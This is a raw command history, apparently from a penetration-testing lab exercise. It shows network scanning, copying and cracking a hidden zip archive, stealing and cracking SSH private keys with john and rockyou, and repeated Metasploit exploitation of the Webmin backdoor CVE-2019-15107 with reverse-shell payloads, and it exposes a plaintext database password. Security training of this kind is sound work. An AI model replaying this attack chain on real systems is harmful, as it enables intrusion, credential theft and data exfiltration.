/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9:~personal/.invoices2019.zip
ls /home/admin/personal/'Croatia 2019'
ls /home/admin/personal/'Italz 2019'
ls /home/admin/personal/'Italy 2019'
ls /home/admin/personal/'Italy 2018'
/ls home
ls /home
ls /home/debian
ls /debian
root@attacker: /home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
root@attacker: /home# scp admin10.1.26.9:~/personal/.invoices2019.zip
frackzip -D
/root
--help
-help
nmap--help
nmap-help
man nmap
nmap -v 10.1.26.0/24
admin@10.1.26.9
ssh admin@10.1.26.9
/root
ls- la
ls -la
cd root
cd admin
cd drwxr-xr-x
cd personal
ls -la
fcrackzip -h
man fcrackzip
man fcrackzip -h
fcrackzip --help
fcrackzip - -help
scp .ivnoices2019.zip
scp .invoices2019.zip
scp .invoices2019.zip /home
fcrakzip -b .invoices2019.zip
fcrackzip -b .invoices2019.zip
man fcrackzip -b .invoices2019.zip
startgame
/root
cd./root
cd.
ls.
/root directory
ls. /root /hacking
--help
nmap --help
nmap -v -sn 10.1.26.0/24
nmap v- sn- 10.1.26.9
-v -sn 10.1.26.9
-sn 10.1.26.9
nmap -v -sn 10.1.26.9
username@10.1.26.255
shh
ssh username@10.1.26.9
shh username@10.1.26.9
ssh username@10.1.26.9
ssh admin@10.1.26.9
scp@: /home/admin
HOME directory
/home/admin
scp /home/admin
-i
-i /home/admin
HOME directory /home/admin
HOME /home/admin
scp
scp -i /home/admin
-o
-i identify_file
-i identify_file /home/admin
locate /hime/admin
locate /home/admin
-locate /home/admin/*back*
locate -i "*.zip"
locate -i /home/admin/"*.zip"
scp @: /home/admin
scp admin@10.1.26.9: /home/admin
lsa
-lsa
ls -a
cd Downloads
ls -a
cd
cd hacking
ls -a
nmap
nmap 10.1.26.0/24
sudo systemctl start ssh.socket
sudo systemctl enable ssh.socket
systemctl status ssh.socket
ssh root@10.1.26.0/24
ssh root@10.1.26.0/24
ip a
ip address
ssh root@192.168.130.200/17
ssh root@10.1.26.0
ssh root@192.168.130.200
ssh root@192.168.130.200
ssh root@10.1.26.23
ssh root@10.1.26.23
ssh root@10.1.26.23
nmpa 10.1.26.23
nmap 10.1.26.23
nmap 10.1.26.0/24
ssh root@10.1.26.23
ssh root@10.1.26.254
ssh root@10.1.26.9
ssh root@10.1.26.9
ssh root@10.1.26.9
ssh admin@10.1.26.9
cd
ls -a
cd personal
ls -a
man fcrackzip
man fcrackzip
fcrackzip -h
fcrackzip
man fcrackzip
sudo apt-get install fcrackzip
scp .invoices2019.zip /local/dir/.invoices2019.zip
scp .invoices2019.zip /local/dir
scp .invoices2019.zip .invoices2019.zip
scp -P 2049 admin@10.1.26.9:root/personal/.invoices2019.zip root/hacking/
scp -P 22 admin@10.1.26.9:root/personal/.invoices2019.zip root/hacking/
scp -P 22 admin@10.1.26.9:~/personal/root/.invoices2019.zip root/hacking/
scp -P 22 admin@10.1.26.9:~/personal/.invoices2019.zip root/hacking/
scp -P 22 admin@10.1.26.9:~/personal/.invoices2019.zip /root/
scp -P 22 admin@10.1.26.9:~/personal/.invoices2019.zip /root
scp -P 22 admin@10.1.26.9:~/personal/.invoices2019.zip /root/hacking/
scp -P 22 admin@10.1.26.9:~/personal/.invoices2019.zip /root/Desktop/
scp admin@10.1.26.9:~/personal/.invoices2019.zip /local/dir
scp admin@10.1.26.9:~/personal/.invoices2019.zip /root/Desktop/
scp admin@10.1.26.9:~/personal/.invoices2019.zip /root/Downloads/
sudo apt-get install fcrackzip
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/hacking
~.
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
find /home/root/ -name .invoices2019.zip
find /root/ -name .invoices2019.zip
/root
ls/root
ls /root
cd /root
/ls /root/hacking
ls /root/hacking
ls /root/templates
cd /root/templates
cd /root/templates/worldlist.txt
cd
cd hacking
ls
cd
cd music
cd templates
cd hacking
cd
cd dokuments
--help nmap
nmap--help
man map
man nmap
nmap 10.1.26.0/24
ssh username@admin
ssh admin@10.1.26.9
ls
cd personal
ls
cd Croatia 2019
cd Croatia2019
ls Mydata.xlsx
ls Treasure-Island.pdf
cd Treasure-Island.pdf
cd
ls
cd personal
cd 'Croatia 2019'
ls
cd personal
back
cd
cd personal
cd 'Italy 2018'
ls
cd
ls
cd personal
cd
cd personal
ls
Mydata.xlsx
man scp
csp man
scp man
scp i
scp -i
scp -i Mydata.xlsx
ls
ls 'Croatia 2019'
ls 'Italy 2018'
cd
ls
cd personal
ls -a
scp @: /.invoices2019.zip
ls .
ls ..
cd ..
cd .
cd..
cd personal
ls -a
ls .invoices2019.zip
scp help
scp @:/ help
scp @: /
scp @: / .invoices2019.zip
man scp
scp .invoices2019.zip admin@:10.1.26.9 /
scp .invoices2019.zip root@:attacker /root
scp .invoices2019.zip root@:attacker /root
scp @: /.invoices2019.zip
scp root@:attacker /.invoices2019.zip
scp admin@:root /.invoices2019.zip
scp @:root /.invoices2019.zip
ls
cd home
scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
man frackzip
man fcrackzip
ls hacking
fcrackzip -D -p wordlist.txt .invoices2019.zip
cd hacking
fcrackzip -D -p wordlist.txt .invoices2019.zip
cd ..
fcrackzip -D -p hacking/wordlist.txt .invoices2019.zip
cd/root
ls -a
cd /root
ls -a
cd hacking
ls -a
cat wordlist.txt
ls -a
cd
cd
ls -a
ls.
cd .face
cd /.face
cd .ssh
ls -a
cd .
cd.
cd
cd
cd desktop
cd Desktop
ls- a
ls -a
cd
cd .gnupg
ls -a
cd priv.
cd priv*
ls -a
cd /root
ls -a
cd hackingg
cd hacking
ls-a
ls -a
clear
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls -a
cd personal
ls-a
ls -a
scp @: /.invoices*
scp @: /.invoices2019.zip
man fcrackzip
cd
cd
man fcrackzip
fcrackzip -h
cat .invoices2019.zip
cat /personal/.invoices2019.zip
cd pers*
ls -a
cd .invoices2019.zip
.invoices2019.zip -D
-D
man -D
man cat
scp @: /.invoices2019.zip
ls -
ls -a
fcrackzip
fcrackzip -help
fcrackzip --help
sudo apt-get update
sudo aptget install fckrackzip
cd /root
man fcrackzip
fcrackzip -D /admin/personal/.invoices2019.zip
fcrackzip -D /home/personal/.invoices2019.zip
ls -a
man scp
scp @: /.invoices2019.zip
scp admin@10.1.26.9: /.invoices2019.zip
scp root@10.1.26.9: /.invoices2019.zip
host list
fcrackzip -D /home/personal/.invoices2019.zip
ipconfig
ipconfig -a
ip config -a
ipconfig -all
ifconfig
whoami
ipconf
ipconfig
ipconfig -all
ifconfig -all
ifconfig
cd
sudo cd
cd.
whereami
ls -a
pwd
scp admin@10.1.26.9: /.invoices2019.zip root@10.1.26.23:/root
scp root@10.1.26.23: /.invoices2019.zip
cd Doc*
ls -a
cd
cd/home
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
la -a
ls -a
fcrackzip -D /.invoices2019.zip
fcrackzip -D .invoices2019.zip
fcrackzip -D /root/.invoices2019.zip
fcrackzip -h
man fcrackzip
list -a
ls-a
ls -a
cd Desktop
ls -a
cd
cd hacking
ls -a
fcrackzip -D wordlist.txt .invoices2019.zip
cd
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D /hacking/wordlist.txt .invoices2019.zip
man fcrackzip
cat wordlist.txt
cp /root/hacking/wordlist.txt > /root
cp /root/hacking/wordlist.txt /root
ls -a
fcrackzip -D wordlist.txt .invoices2019.zip
fcrackzip -D .invoices2019.zip wordlistt.txt
fcrackzip -D .invoices2019.zip wordlist.txt
fcrackzip -D .invoices2019.zip wordlist.txt
cat wordlist.ttxt
cat wordlist.txt
fcrackzip -D -p wordlist.txt .invoices2019.zip
fcrackzip -D wordlist.txt .invoices2019.zip
pwd
ls
ls -a
ls
cd hacking
ls
\cat worlist.txt
\cat wordlist.txt
cd ..
pwd
ls
cd desktop
cd Desktop
ls
ls -a
cd ..
ls
cd Downloads
ls
ls -a
cd ..
ls
cd hacking
ls
ls -a
nmap --help
cd ..
pwd
nmap 10.1.26.0/24
ssh root@10.1.26.9
ssh admin@10.1.26.9
pwd
ls -a
cd personal
ls
ls -a
scp .invoices2019.zip root@10.1.26.23:/home
pwd
exit
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /home
man fcrackzip
dcrackzip -j
fcrackzip --help
pwd
ls
cd hacking
ls
cd ..
pwd
cd ..
ls
cd home
ls
ls -a
fcrackzip -v -u -D -p /root/hacking/wordlist.txt /home/.invoices2019.zip
pwd
ls
home
cd home
ls
cd ..
cd root
ls
cd hacking
ls -a
nmap
cd ..
--help
nmap
nmap --help
man nmap
nmap -sn 192..168.56.0/24
-sn
nmap 192.168.56.1,100-102
nmap
nmap 10.1.26.0/24
ssh
ssh admin@10.1.26.0/24
ssh admin@10.1.26.1/24
ssh admin@10.1.26.1
ssh admin@10.1.26.1
ssh admin@10.1.26.1
ssh admin@10.1.26.1
ssh admin@10.1.26.9
home
nmap
cd
ls
cd personal
ls -a
cd ..
scp
exit
scp
ssh admin@10.1.26.9
pvd
pwd
ls
exit
scp admin@10.1.26.9:/home/admin/parsonal/.invoices2019.zip /root
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root
pwd
ls
ls -a
pwd
cd hacking
cat wordlist.txt
exit
fcrackzip -v -u -D -p /root/hacking/wordlist.txt /root/.invoices2019.zip
nmap --help
nmap 172.18.1.5
ls
cd Documents/
ls
cd ..
nmap --help
nmap -sV 172.18.1.5
nmap -sV 172.18.1.5:10000
nmap -sV --p 10000 172.18.1.5
nmap -sV -p 10000 172.18.1.5
vim cve.sh
metaflac --help
ls
msfconsole 
help
show
help
search remote
search remote code execution
search webmin
help
help search
search cve 2019-15107
search cve 2019-15107 type exploit
help search
search cve 2019-15107 type exploit name webmin platform unix
help search
search name webmin
help search
search webmin
help
use exploit/47230
help
help exploit
exploit -t 172.18.1.5
options
set RHOST 172.18.1.5
exploit
set LHOST 127.0.0.1
exploit
set LHOST 10.1.135.83
exploit
ls
ls -la
cd .ssh
ls -la
vim id_rsa
vim id_rsa.pub
ssh eva@10.1.17.4
ssh eve@10.1.17.4
cd /etc/ssh
ls -la
cat ssh_host_rsa_key
ls
ls -la
ping 10.1.17.4
cd
ls -la
cd .ssh
ls -la
chmod 600 id_rsa
ssh eve@10.1.17.4
ls -la
ssh eva@10.1.17.4
ssh eve@10.1.17.4
cd
ls
ssh2john .ssh/id_rsa
ssh2john .ssh/id_rsa >> good_key
ls
john 
john good_key 
ls
pwd
cd ..
ls
cd /etc/john/
ls -la
cd ..
cd /usr/share/wordlists/
ls
john --wordlist=/usr/share/wordlists/rockyou.txt good_key
ssh eve@10.1.17.4
nmap -h
nmap -sV -sC 172.18.1.5
nmap  172.18.1.5
nmap -p
nmap -sC -sV -p 10000 172.18.1.5
nmap -h
vi xpl.sh
searchsploit webmin
exploits/multiple/remote/1997.php
msfconsole 
msfvenom exploits/multiple/remote/1997.php
msfconsole 
help
use exploits/multiple/remote/1997.php
use webmin
search webmin
use exploit/unix/webapp/webmin_show_cgi_exec
help
check
quit
msfconsole 
searchsploit webmin
search webmin
use auxiliary/admin/webmin/edit_html_fileaccess
run
use  exploit/47230
run
set RHOST 172.18.1.5
run
set LHOST 10.1.135.83
run
options
set RHOST 172.18.1.5
ssh -i id_rsa eva@10.1.17.4
ls
python ssh2john.py 
python -m SimpleHTTPClient
cat ssh2john.py 
ls
pwd
import base64
import binascii
import codecs
from struct import unpack
import sys
DES3 = 0
AES = 1
AES_256 = 2
CIPHER_TABLE = {
def read_private_key(filename):
def read_private_key(filename):
ls
cd Documents/
ls
cd ..
cd Downloads/
ls
cd ..
cd ..
ls
cd usr/
ls
cd share/
ls
cd wordlists/
ls
cd ~
ls
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsaa
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa
john2ssh
python ssh2john.py
python ssh2john.py id_rsa 
python ssh2john.py id_rsa > rsa_key
/root/.john/
/root/.john/sessions/
john
john --wordlist=/usr/share/wordlists/rockyou.txt rsa_key 
.nmap -sV 172.18.1.5
nmap -sV 172.18.1.5
nmap -sn 172.18.1.5
metasploit --version
clear
metasploit
search webmin
clear
mfsconsole
search webmin
use exploit/47230
show options
set LHOST 172.18.1.5
set LPORT 10000
set SHELL /bin/bash
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
use webmin
use exploit/47230
show options
set RPORT
set LPORT
set LPORT
set LPORT
exit
msfconsole
use exploit/47230
show options
set RHOST 172.18.1.5
set RPORT 10000
set LHOST 10.1.135.83
check
exploit
sessions
sessions -u 1
sessions
sessions -i 2
sessions
sessions -u 1
sessions
sessions -i 3
ls
ssh 10.1.17.4
ssh eve@10.1.17.4
ssh -i id_rsa eve@1.10.17.4
man ssh
ssh -i id_rsa eve@1.10.17.4 -vvv
ping 10.1.17.4
ssh eve@1.10.17.4
ssh 1.10.17.4
ssh 1.10.17.4 -vvv
nmap 10.1.17.4 -p 22
ssh eve@10.1.17.4
ssh -i id_rsa eve@1.10.17.4 -vvv
ssh 172.18.1.5
open nmap
nmap
nmap 172.18.1.5
nmap -sV 172.18.1.5
nmap -sV 1000
search webmin
use exploit/47230
show options
set RHOST 172.18.5.1
set RPORT 10000
set LHOST 10.1.135.83
check
set RHOST 172.18.1.5
check
nmap -p 80 172.18.1.5
nmap -p 20000 172.18.1.5
for i in {1..65535}; do nmap -p ${i} 172.18.1.5 >> out.txt; done
for i in {65535..1}; do nmap -p ${i} 172.18.1.5 >> out.txt; done
nmap -p 172.18.1.5
nmap 172.18.1.5
nmap 172.18.1.5
nmap -p 10000 172.18.1.5
mv script script.py
script.py 172.18.1.5:10000 ls
python script.py 172.18.1.5:10000 ls
python script.py 172.18.1.5:10000/session_login.cgi ls
python script.py 172.18.1.5:10000 ls
python script.py 172.18.1.5:10000 id
python3 script.py 172.18.1.5:10000 ls
python script.py 172.18.1.5:10000 ls
python script.py https://172.18.1.5:10000 ls
python script.py http://172.18.1.5:10000 ls
python script.py http://172.18.1.5:10000 cd /root;ls
python script.py http://172.18.1.5:10000 "cd /root;ls"
python script.py http://172.18.1.5:10000 "cat *"
python script.py http://172.18.1.5:10000 "ls"
python script.py http://172.18.1.5:10000 "cat twofactor.pl"
python script.py http://172.18.1.5:10000 "ls"
python script.py http://172.18.1.5:10000 "cat CHANGELOG"
python script.py http://172.18.1.5:10000 "ls"
python script.py http://172.18.1.5:10000 "twofactor_form.cgi"
python script.py http://172.18.1.5:10000 "cat twofactor_form.cgi"
python script.py http://172.18.1.5:10000 "cat *" > out.txt
grep "\d{5}" out.txt
mv myscript.py
mv myscript myscript.py
python3 myscript.py
python3 myscript.py
python3 myscript.py
python3 myscript.py
nmap
nmap 172.18.1.5
nmap -p-  172.18.1.5
~htop
top
nmap -p-  172.18.1.5
mfsconsole
mfsconsole
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor 
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
sudo nmap -sP -n 172.18.1.0
sudo nmap -sP -n 172.18.1.0/24
sudo nmap -sP -n -F 172.18.1.0/24
sudo nmap -sP -n 172.18.1.5
nmap -p0-65535 172.18.1.0/24
nmap -F 172.18.1.5
nmap -sV 172.18.1.5
python CVE_2019_15107.py https://10.10.20.166:10000 ls
python CVE_2019_15107.py https://10.10.20.166:10000
curl -L https://10.10.20.166:10000/password_change.cgi
map -p  172.18.1.5
nmap -p  172.18.1.5
nmap -p- 172.18.1.5
man nmap
nmap -sV -p 10000 172.18.1.5
ls
cd /root
ls
cd /home/
ls
ls debian/
cd /root
ls Documents/
ls Downloads/
man nmap
man metasploit
metasploit
msf
msf
show exploits
shooooooooooooow exploiiiiiiiiiiii2
show exploits
msfconsole
search
ls
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
nmap 172.18.1.5
nmap -A 172.18.1.5
clear
nmap -A 172.18.1.5
nmap -sV 172.18.1.5
docker-compose up -d
ls
mfconsole
mfs
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set rhosts 172.18.1.5
set ssl true
set lhosts 10.1.135.83
exploit
set lhost 10.1.135.83
exploit
cd /root/
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set rhost 172.18.1.5
set ssl true
set lhost 10.1.135.83
exploit
search webmin
use exploit/unit/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
options
set rhosts 192.168.90.107
set ssl true
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set rhosts 172.18.1.5
set rport 10000
set lhost 10.1.135.83
exploit
search webmin
use exploit/unix/webapp/webmin_backdoor
show options 
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
search webmin
use exploit/unix/webapp/webmin_backdoor
show options 
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
nmap 172.18.1.5
nmap -sV 172.18.1.5
mfsconsole
mfs
mfs
clear
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set RHOSTS 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check 
set ssl true
check
search webmin
use exploit/unix/webapp/webmin_backdoor
options 
set rhosts 172.18.1.5
set rport 10000
set lhost 10.1.135.83
set ssl true
set lhost 10.1.135.83
check
set ssl false
check
exploit
search webmin
use exploit/unix/webapp/webmin_backdoor
show options 
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
options
exit
exit -y
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set rhosts 10.1.17.4
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 10.1.17.4
set LHOST 10.1.135.83
check
exploit
set RHOST 10.17.4
set ssh clear
search webmin
use exploit/linux/http/webmin_pavk
search webmin
use auxiliary/admin/webmin/file_disclosure
show options
set RHOSTS 10.1.17.4
set LHOST 10.1.135.83
check
exploit
search webmin
search weebmin
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 10.1.17.4
set LHOST 10.1.135.83
check
exploit
set RHOST 172.18.1.5
set LHOST 10.1.135.83
check 
exploit
cd /etc/
cd ..
cd /home
cd debian 
cd ..
cd 
cd ..
exploit
exit
exit -y
ls
rm ssh*
clear
ls
ls /home/eve//.ssh
ls /home/eve/.ssh
john2ssh id_rsa > hash
john2ssh
john
john id_rsa > hash
msfexploit
mfsexploit
clear
mfsconsole
mfsconsole
msfconsole
search webmin
use exploit/unix/webapp/webminnnnnnnnnnnnnnnnnnnn_backdoor
set RHOST 172.18.1.5
use   exploit/unix/webapp/webmin_backdoor
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
exit -y
ls
cd hsah
cd hash
msfconsole
search webmin
use /exploit/unix/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
check
set RHOST 172.18.1.5
set LHOST 10.1.135.83333333
set LHOST 10.11.135.83
set RPORT 10000
check
exploit
exit -y
clllear
clear
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
cd /home/
exit -y
cd /home
ls
cd debian
ls
cd ..
ls
ls /
ls /home/
meterpreter
clear
ls
cd ..
clear
ls
john2ssh id_rsa > hash
cd /home
ls
cd ..
clear
ls
cd /home
clear
ls
cd ..
cllear
lclear
ls
clear
ls
msfconsole
cd /home/
cd ..
search weeeebmin
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
exit -y
ls
ls /home/
ipconfig
netsh
ip
ip -V
ip address
ls
locate
locate id_rsa
clear
msfconsole
search webmin
use exploiut/unix/webapp/webmin_backdoor
search webmin
use exploit/unix/webapp/webmin_backdoor
show optionsssssssssssssssss
show options
set RHOST 172.18.1.5
set LHOSTTTTTT                        10.1.135.83
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
exit -y
clear
locate ssh2john.py
ls
cp $(locate ssh2john.py) .
cp /uuuuusr/share/john/ssh2john.py .
cp /usr/share/john/ssh2john.py .
ls
touch id_rsa
vi id_rsa
cat id_rsa
clear
ls
python ssh2john.py id_rsa >    id_rsa.hash
locate rockyou.txt
cp $(locate rockyou.txt) .
clear
ls
gunzip rockyou.txt.gz
clear
ls
john id_rsa.hash -wordlist=rockyou.txt
sjoohn crack --show
john crack --show
ssh2john id_rsa > crack
john --format=SSH --wordlist=rockyou.txt crack
john --format=SSH --wordlist=rockyou.txt id_rsa.hash
cat id_rsa.hash
john id_rsa.hash --wordlist=rockyou.txt
ls
rm i* rock* hash crack ssh2*
ls
clear
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
exit -y
clear
ls
mkdir solution 7
cd s
cd solution/
ls
clear
ls
cd ..
ls
rmdir 7
clear
ls
cd solution/
clear
ls
pdpbpaste > id_rsa
pbpaste > id_rsa
touch id_rsa
vi id_rsa
rm id_rsa
clear
msfconsole
search webmin
use exploit/unix/webapp/webmin_backdoor
show options
set RHOST 172.18.1.5
set LHOST 10.1.135.83
set RPORT 10000
check
exploit
cd home
cd /home
msfcoooooonnnnsoooole
msfconnnnnnnsole
msffffffconsoele
msfconssole
msfconsole
nmap --help
nmap -p1-65535 172.18.1.5
msfdb init
msf
apt-get install armitage
apt-get update
exit
armitage
back
db_status
setg
back
back
db_connect msf:"h+L0Xf0385dbIjRgtPnNOaZSMxa7YHoFzS6ojuOkYFc="@localhost:5432/msf
use windows/meterpreter/reverse_tcp
back
back
setg LHOST 10.1.135.83
jobs
back
setg LPORT 28605
back
back
hosts -a 172.18.1.5
back
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.18.1.5
set THREADS 24
set PORTS 50000, 21, 1720, 80, 443, 143, 623, 3306, 110, 5432, 25, 22, 23, 1521, 50013, 161, 2222, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5901, 5902, 5903, 5904, 5905, 5906, 5907, 5908, 5909, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985, 5986, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 47001, 523, 3500, 6379, 8834
run -j
db_nmap --min-hostgroup 96 -T4 -A -v -n 172.18.1.5
show exploits
back
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.18.1.5
set THREADS 24
set PORTS 50000, 21, 1720, 80, 443, 143, 623, 3306, 110, 5432, 25, 22, 23, 1521, 50013, 161, 2222, 17185, 135, 8080, 4848, 1433, 5560, 512, 513, 514, 445, 5900, 5901, 5902, 5903, 5904, 5905, 5906, 5907, 5908, 5909, 5038, 111, 139, 49, 515, 7787, 2947, 7144, 9080, 8812, 2525, 2207, 3050, 5405, 1723, 1099, 5555, 921, 10001, 123, 3690, 548, 617, 6112, 6667, 3632, 783, 10050, 38292, 12174, 2967, 5168, 3628, 7777, 6101, 10000, 6504, 41523, 41524, 2000, 1900, 10202, 6503, 6070, 6502, 6050, 2103, 41025, 44334, 2100, 5554, 12203, 26000, 4000, 1000, 8014, 5250, 34443, 8028, 8008, 7510, 9495, 1581, 8000, 18881, 57772, 9090, 9999, 81, 3000, 8300, 8800, 8090, 389, 10203, 5093, 1533, 13500, 705, 4659, 20031, 16102, 6080, 6660, 11000, 19810, 3057, 6905, 1100, 10616, 10628, 5051, 1582, 65535, 105, 22222, 30000, 113, 1755, 407, 1434, 2049, 689, 3128, 20222, 20034, 7580, 7579, 38080, 12401, 910, 912, 11234, 46823, 5061, 5060, 2380, 69, 5800, 62514, 42, 5631, 902, 5985, 5986, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 47001, 523, 3500, 6379, 8834
run -j
msfconsole
set RHOSTS 172.18.1.5
show
show all
show
set exploit
set exploit 2019-15107
help
db_nmap --min-hostgroup 96 -T4 -A -v -n 172.18.1.5
use exploit/multi/handler
set LHOST 0.0.0.0
set PAYLOAD generic/shell_reverse_tcp
set LPORT 14718
set ExitOnSession false
exploit -j
use exploit/47230
set RHOSTS 172.18.1.5
set TARGETURI /
set TARGET 0
set LHOST 10.1.135.83
set LPORT 11265
set PAYLOAD generic/shell_bind_tcp
set RPORT 80
set SSL 0
exploit -j
use exploit/47230
set RHOSTS 172.18.1.5
set TARGETURI /
set TARGET 0
set LHOST 10.1.135.83
set LPORT 2139
set PAYLOAD generic/shell_bind_tcp
set RPORT 10000
set SSL 0
exploit -j
sessions
sessions -u 1
use exploit/47230
set RHOSTS 
set TARGETURI /
set TARGET 0
set LHOST 10.1.135.83
set LPORT 26069
set PAYLOAD generic/shell_bind_tcp
set RPORT 10000
set SSL 0
exploit -j
use exploit/multi/handler
set LHOST 10.1.135.83
set LPORT 8871
set PAYLOAD generic/shell_reverse_tcp
set ExitOnSession false
exploit -j
hosts -a 172.18.1.5
back
use exploit/47230
set RHOSTS 172.18.1.5
set TARGETURI /
set TARGET 0
set LHOST 10.1.135.83
set LPORT 17595
set PAYLOAD generic/shell_bind_tcp
set RPORT 10000
set SSL 0
exploit -j
sessions
sessions -u 3
sessions --help
sessions -h
sessions -c 3 ls
sessions 3 -c ls
sessions 3 -c dir
sessions 3 -c ls
sessions 3 -c dir
sessions 3 -c cd /
sessions 3 -c pwd
sessions 3 -c dir
sessions 3 -c WARNING-READ-ME.txt
sessions 3 -c nano WARNING-READ-ME.txt
sessions 3 -c leafpad WARNING-READ-ME.txt
sessions 3 -c editor WARNING-READ-ME.txt
sessions 3 -c "editor WARNING-READ-ME.txt"
sessions -u 
sessions -u 1
sessions
sessions 3 -c "less WARNING-READ-ME.txt"
sessions 3 -c ls
sessions -k 3
sessions -c cd ?
sessions -c cd /
sessions -c "cd /"
sessions -c dir
sessions -c "search history"
sessions -c "find history"
sessions -c "find *.bash_history"
sessions -c "find -name *.bash_history"
sessions -c "dir /home/eve"
sessions -c ls
sessions -c "dir /home"
sessions -c "cd /home/eve"
sessions -c ls
sessions 3 -c "less .bash_history"
hosts -a 10.1.17.4
back
sessions 3 -c "tree"
sessions 3 -c "pwd"
sessions 3 -c "dir"
sessions 3 -c "cd /"
sessions 3 -c "find -name ssh"
sessions 3 -c "cd /etc/ssh"
sessions 3 -c "dir"
sessions 3 -c "less ssh_host_rsa_key"
openssh
ssh
ssh -i /root/ssh
dir
dir desktop
dir Desktop
ssh -i /root/desktop/ssh
less /desktop/ssh
pwd
less /root/desktop/ssh
less /root/Desktop/ssh
ssh -i /root/Desktop/ssh 10.1.17.4
sessions 3 -c "less ssh_host_ecdsa_key.pub"
ssh -i /root/Desktop/sshpub 10.1.17.4
sessions 3 -c "less ssh_host_ecdsa_key"
ssh -i /root/Desktop/ssh 10.1.17.4
ssh
ssh -i /root/Desktop/ssh 10.1.17.4
sessions 3 -c "less ssh_config"
ssh -i /etc/ssh/ssh_comp 10.1.17.4
chmod 600 /etc/ssh/ssh_comp
ssh -i /etc/ssh/ssh_comp 10.1.17.4
sessions 3 -c "cd /usr/bin/ssh"
sessions 3 -c "ls"
sessions 3 -c "less sshd_config"
sessions 3 -c "ls"
sessions 3 -c "less ssh_host_ecdsa_key"
sessions -c "cd /"
sessions -c "find -fname ecdsa"
sessions -c "find -name ecdsa"
sessions -c "find -name ecdsa_key"
sessions -c "find -fname *ecdsa_key"
sessions -c "find -fname ssh_host_ecdsa_key"
sessions -c "pwd"
sessions -c "ls"
python ssh2john.py
python ssh2john.py /etc/ssh/ssh_comp
python ssh2john.py --help
python ssh2john.py
python ssh2john.py
python ssh2john.py /root/Desktop/ssh_comp
john --wordlist rockyou.txt /root/Desktop/john
john --wordlist /root/Desktop/john
john --wordlist /usr/share/wordlists/rockyou.txt /root/Desktop/john
ssh -i /etc/ssh/ssh_comp 10.1.17.4
ssh -i /usr/Desktop/ssh_comp 10.1.17.4
ssh -i /root/Desktop/ssh_comp 10.1.17.4
chmod 600 /root/Desktop/ssh_comp
ssh -i /root/Desktop/ssh_comp 10.1.17.4
nmap 172.18.1.5
netstat -lpn
netstat -lpn | grep 10000
netstat -na
netstat -sV
man netstat
touch webmin.sh
nano webmin.sh
chmod +x webmin.sh
./webmin.sh
perl --version
ruby --version
ls
chmod +x 47230.rb
ls
./47230.rb
./webmin.sh https://localhost:10000
